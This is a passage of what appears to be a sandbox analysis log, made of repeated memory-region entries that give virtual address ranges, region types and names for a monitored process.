0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14056 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 14057 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 14058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14125 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14166 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14167 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 14168 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 14169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14195 start_va = 